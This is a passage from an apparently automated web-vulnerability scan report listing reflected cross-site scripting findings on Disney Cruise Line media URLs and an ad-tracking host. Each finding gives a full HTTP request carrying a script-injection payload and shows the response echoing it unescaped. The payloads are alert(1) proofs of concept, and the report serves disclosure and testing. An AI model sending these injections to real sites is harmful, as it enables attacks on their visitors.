
Request

GET /concat/4.39.1.59c6ad"><script>alert(1)</script>4d3fe98385e/css?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:24 GMT
Content-Length: 33368
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/concat/4.39.1.59c6ad"><script>alert(1)</script>4d3fe98385e/css" />
...[SNIP]...

5.36. http://dcl2.wdpromedia.com/concat/4.39.1.5/css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /concat/4.39.1.5/css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fdd5"><script>alert(1)</script>138273281c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /concat/4.39.1.5/css1fdd5"><script>alert(1)</script>138273281c3?files=/global/core.css,/global/visualStyles/main/main.css,/global/headers/globalHeader.css,/global/footers/globalFooter.css,/global/buttons/buttons.css,/global/main/sharedMain.css,/modules/billboardMedia.css,/modules/homepageFeaturesModule.css,/modules/quickQuote.css,/modules/homepage.css,/modules/infoBoxWide6.css,/modules/RolloverImageHyperlink.css,/modules/L1Overview.css,/modules/leftSubNavigation.css,/modules/funFactsAndTips.css,/modules/relatedItinerariesWide6.css,/modules/relatedContentFlourishBoxWide6.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:47 GMT
Content-Length: 33368
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/concat/4.39.1.5/css1fdd5"><script>alert(1)</script>138273281c3" />
...[SNIP]...

5.37. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/commerce-DVD.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ae94"><script>alert(1)</script>eac3162730f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media3ae94"><script>alert(1)</script>eac3162730f/dcl_v0400/Global/Promo/220x102/commerce-DVD.png?t=1285273958056 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:08 GMT
Content-Length: 102647
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media3ae94"><script>alert(1)</script>eac3162730f/dcl_v0400/Global/Promo/220x102/commerce-DVD.png" />
...[SNIP]...

5.38. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ef40"><script>alert(1)</script>f5657d3ea61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media1ef40"><script>alert(1)</script>f5657d3ea61/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png?t=1285273957650 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:00 GMT
Content-Length: 33412
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media1ef40"><script>alert(1)</script>f5657d3ea61/dcl_v0400/Global/Promo/220x102/commerce-SpecialOffers.png" />
...[SNIP]...

5.39. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/220x102/content-Videos.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/220x102/content-Videos.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1bc9"><script>alert(1)</script>077b2728ef3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaa1bc9"><script>alert(1)</script>077b2728ef3/dcl_v0400/Global/Promo/220x102/content-Videos.png?t=1285273956040 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:19 GMT
Content-Length: 33404
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediaa1bc9"><script>alert(1)</script>077b2728ef3/dcl_v0400/Global/Promo/220x102/content-Videos.png" />
...[SNIP]...

5.40. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/906X46/visaFinancing2.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9295a"><script>alert(1)</script>96a168aa4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media9295a"><script>alert(1)</script>96a168aa4af/dcl_v0400/Global/Promo/906X46/visaFinancing2.png?t=1285940677233 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:26:52 GMT
Content-Length: 33403
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media9295a"><script>alert(1)</script>96a168aa4af/dcl_v0400/Global/Promo/906X46/visaFinancing2.png" />
...[SNIP]...

5.41. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecb43"><script>alert(1)</script>40b5281772 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediaecb43"><script>alert(1)</script>40b5281772/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg?t=1278609104857 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:25 GMT
Content-Length: 102680
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediaecb43"><script>alert(1)</script>40b5281772/dcl_v0400/Global/Promo/DCL_VisaSave40_Tile_Link.jpg" />
...[SNIP]...

5.42. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44b7"><script>alert(1)</script>6eb83ba471b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediae44b7"><script>alert(1)</script>6eb83ba471b/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg?t=1260481711585 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:24 GMT
Content-Length: 102673
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediae44b7"><script>alert(1)</script>6eb83ba471b/dcl_v0400/Global/Promo/promoFreeDVD2010.jpg" />
...[SNIP]...

5.43. http://dcl2.wdpromedia.com/media/dcl_v0400/Global/globalHeader/logoDCL.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Global/globalHeader/logoDCL.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ff92"><script>alert(1)</script>fd9c1d11d27 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media2ff92"><script>alert(1)</script>fd9c1d11d27/dcl_v0400/Global/globalHeader/logoDCL.png?t=1242662094147 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:39 GMT
Content-Length: 102641
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media2ff92"><script>alert(1)</script>fd9c1d11d27/dcl_v0400/Global/globalHeader/logoDCL.png" />
...[SNIP]...

5.44. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9943"><script>alert(1)</script>da2cec6217b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mediac9943"><script>alert(1)</script>da2cec6217b/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg?t=1302109283890 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:25:56 GMT
Content-Length: 102664
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/mediac9943"><script>alert(1)</script>da2cec6217b/dcl_v0400/Site/DCLContent/Media/Assets/Home/Hero_904px_green.jpg" />
...[SNIP]...

5.45. http://dcl2.wdpromedia.com/media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e20d"><script>alert(1)</script>5087c26d2bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media6e20d"><script>alert(1)</script>5087c26d2bb/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg?t=1245453798364 HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/special-offers/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:32 GMT
Content-Length: 102701
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media6e20d"><script>alert(1)</script>5087c26d2bb/dcl_v0400/Site/DCLContent/Media/Assets/SpecialOffers/overview_904px.jpg" />
...[SNIP]...

5.46. http://dcl2.wdpromedia.com/media/dcl_v0400/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /media/dcl_v0400/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92089"><script>alert(1)</script>c597bb81d5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /media92089"><script>alert(1)</script>c597bb81d5c/dcl_v0400/favicon.ico HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:29:34 GMT
Content-Length: 32945
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/media92089"><script>alert(1)</script>c597bb81d5c/dcl_v0400/favicon.ico" />
...[SNIP]...

5.47. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55aa9"><script>alert(1)</script>a9eabed6abe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /55aa9"><script>alert(1)</script>a9eabed6abe/concat/2.39.0.9/css?files=/global/print.css HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:08 GMT
Content-Length: 33443
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/55aa9"><script>alert(1)</script>a9eabed6abe/concat/2.39.0.9/css" />
...[SNIP]...

5.48. http://dcl2.wdpromedia.com/reservations/concat/2.39.0.9/js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dcl2.wdpromedia.com
Path:   /reservations/concat/2.39.0.9/js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15880"><script>alert(1)</script>099c91ddff2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15880"><script>alert(1)</script>099c91ddff2/concat/2.39.0.9/js?files=/global/loaderInit.js HTTP/1.1
Host: dcl2.wdpromedia.com
Proxy-Connection: keep-alive
Referer: http://disneycruise.disney.go.com/reservations/customize?execution=e1s3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:36:12 GMT
Content-Length: 33442
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<h
...[SNIP]...
<link rel="canonical" href="http://disneycruise.disney.go.com/15880"><script>alert(1)</script>099c91ddff2/concat/2.39.0.9/js" />
...[SNIP]...

5.49. http://f.nexac.com/e/a-677/s-2140.xgi [na_kw parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /e/a-677/s-2140.xgi

Issue detail

The value of the na_kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19fb8"><script>alert(1)</script>ed9f7d4095b was submitted in the na_kw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=19fb8"><script>alert(1)</script>ed9f7d4095b HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:37 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:37 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:37 GMT
Server: lighttpd/1.4.18
Content-Length: 425


<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d2011051519270862126421219180&phint=__bk_t%3dFingerhut: Credit Application&phint=__bk_k%3d19fb8"><script>alert(1)</script>ed9f7d4095b&limit=4" height="0" width="0" frameborder="0">
...[SNIP]...

5.50. http://f.nexac.com/e/a-677/s-2140.xgi [na_title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://f.nexac.com
Path:   /e/a-677/s-2140.xgi

